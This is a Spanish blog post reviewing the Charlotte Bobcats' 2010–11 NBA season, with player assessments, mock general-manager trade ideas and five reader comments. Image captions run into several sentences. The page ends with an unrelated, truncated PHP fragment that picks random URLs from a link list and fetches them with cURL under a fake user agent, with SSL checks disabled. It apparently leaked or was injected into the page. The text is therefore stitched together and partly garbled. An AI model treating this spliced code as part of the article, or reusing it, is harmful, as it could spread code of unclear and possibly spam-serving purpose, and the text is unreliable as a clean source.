Charlotte Bobcats: Suspenso

20 de June de 2011 por telekoman

La temporada ha sido difícil para los gatos monteses de Charlotte tras haber tocado techo la pasada en el mejor año de su corta historia. Uno de sus grandes líderes y capitanes, Gerald Wallace, se marchó a cambio de prácticamente nada por obra y gracia del amigo Jordan. 18 puntos y mucho Stephen Jacksonentusiasmo es una pérdida grande. 34 victorias en la conferencia Este es poco, aunque eso sí, algunas de mucho mérito como las conseguidas ante Lakers, Boston, Chicago o Atlanta.

Al mando de las operaciones quedó únicamente el capitan. Stephen Jackson ha mantenido con  algún altibajo el nivel de su primera temporada con los Bobcats. Pero ser el único jugador del equipo por encima de 17 puntos de media hace imposible mantener el ánimo. Al dorsal número 1 de Charlotte le quedan 2 temporadas más de contrato por 9 y 10 millones respectivamente. Este montante hace que sea difícil que salga del equipo, al menos este año aunque la temporada siguiente puede ser objetivo fácil de algún equipo con un anillo como objetivo.

D.J Augustin ha dado un paso importante en su carrera demostrando que podría ser el base titular de un equipo de playoffs. En estos momentos es el mejor activo a futuro de la franquicia, aunque eso no parece significar nada dentro de un equipo tan poco estable. Sus 14 puntos y más de 6 asistencias, y su presencia en momentos importantes de la temporada le avalan. Se le seguirá atentamente.

Otro que también se ha reivindicado ha sido Kwame Brown. Ha terminado siendo el pivot titular del equipo y aunque sus números no sean espectaculares, ha aportado más de lo que parece. Curiosamente, el equipo no está Augustin intenta una penetración frente a Rondomal armado por dentro tras el traspaso de Wallace por Przybilla siempre que éste se recupere. Evidentemente estamos hablando de la parcela defensiva. En la ofensiva es todo un erial. Además Kwame termina contrato este año con lo que la incertidumbre es todavía mayor.

Queda la incógnita Boris Diaw. El francés ha hecho una temporada tirando a regulera. El 4 titular del equipo en los 82 partidos disputados (y los 82 de la pasada campaña) sólo ha conseguido 11 puntos y 5 rebotes de media. Insuficiente para ser el tío mejor pagado de la franquicia. Este año tiene una player option de 9 kilos que seguramente cumplirá para luego ir a llenar el cazo a otro sitio. De Tyrus Thomas preferiría no hablar. Con problemas físicos de todo tipo ha estado disponible poco más de dos meses, con altísimo grado de irregularidad.

Finalmente el curso ha estado marcado por la inestabilidad también en el banquillo. Siempre extrañó la elección de Larry Brown como gestor de la reconstrucción. Los resultados no han sido malos pero a su salida no queda ni un ladrillo en pie de legadopara su sucesor Paul Silas. Confiemos que éste pueda aportar una visión más a largo plazo para la franquicia.

Lo mejor: D.J. Augustin parece que ha dado un paso adelante  mientras que Jackson no ha dado un paso atrás. Kwame Brown ha hecho una temporada digna.

Lo peor: Que su techo histórico haya sido lo del año pasado y ahora toque volver a reconstruir. Al equipo le falta anotación por los 4 costados y nadie parece dispuesto a comerse el mundo. Que Jordan está al mando y algo puede improvisar.

Jugando a G.M.:

– El equipo ahora mismo no tiene ningún futuro tal y como está confeccionado. Me quedaría con la base Augustine, Gerald Henderson, intentaría mantener a KwameMichael Jordan eligiendo a Kwame Brown en el draft Brown (y van dos veces en positivo) y a Dante Cunninghan. Estos dos, eso sí, a precio normalito, que no se nos suban a la parra. A pasar el año que viene con más pena que gloria y a acaparar rondas y a ver que pescamos en el draft del 2012.

– Colocar en la medida de lo posible a Boris Diaw si decide prolongar su contrato con la player option. Se trata de un expiring que debería poder ser canjeado sin problemas como mínimo por alguna ronda ahora o intentar aprovechar durante el curso las necesidades económicas de otros para sacar tajada.

– A Tyrus no le vamos a poder colocar ni de broma. Propenso a lesiones más contrato largo y caro. Si suena la flauta y nos dan por él una barra de pan, aceptamos el trade. Si no apechugar. Con Diop no quiero contaros nada. Dos añitos más a 6 kilitos cada uno…

– Stephen Jackson es uno de los mejores activos con los que cuenta Jordan. Puede ser interesante para algún equipo que requiera de anotación aun al precio de sus muchos tiros. Por él podríamos conseguir algún joven interesante que los equipos estén dispuestos a ceder. Podríamos incluso incluirlo en algún trade para adelantar nuestra ronda de draft de este año. Tampoco es urgente largarlo convirtiéndose el año que viene en un expiring jugosísimo. Con todo probablemente Jordan lo terminará incluyendo en algún traspaso sin sentido en el peor momento del mundo.

– Elección número 9 del draft. Si puedo adelantarla estupendo, si no veré lo que me queda. Yo intentaría mejorar la posición 3 fuera como fuera. Si Detroit escoge a Vesely me quedaría con Klay Thompson mejor que con Kawhi Leonard.

Comenta

5 comentarios a esta entrada

  1. Denise dice:
    #1

    El equipo que peor traspasa y ficha con diferencia, el que esté al mando de esto, ya sea Jordan o el GM es un inepto y un incompetente.
    En fin, el equipo más aburrido de la NBA junto a los actuales Pistons.

      Citar

  2. Esteban dice:
    #2

    diaw y jackson deben regalarlos este año

    a cambio de ellos, rondas de draft del año q viene
    asi:

    charlote, tendria q temrinar con uno de los peores registros e irse bien arriba en un draft que parece q tiene buna pinta, sullinger o el propio rivers, perry jones

    conseguir mas rondas del proximo draft por estos dos jugadores, de buen nivel y expiring, y entre la segunda ronda que le corresponderia a charlotte mas las que puede sumar poe estos dos jugadores, subir aun mas otra eleccion de draft

    asi podria, con mucho suerte aspirar a por ejemplo un puesto 1 y un puesto 7 u 8

    de ahy en mas mirar el futuro, este equipo no tiene presente

      Citar

  3. Blade Petrovic dice:
    #3

    mal año en general de charllotte.Me despido del blog por un tiempo me voi de vacaciones.felices vacaciones a todos

      Citar

  4. Blade Petrovic dice:
    #4

    ah se me olvida txusma te lo he vuelto a enviar a txusma@tjnba

      Citar

  5. Cocinitas dice:
    #5

    Bufff papelon el que tienen encima los Bobcats, les veo vagando por el desierto unas cuantas temporadas. Yo traspasaria a mis mejores activos e intentaria hacerme con elecciones bajas para los proximos draft.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>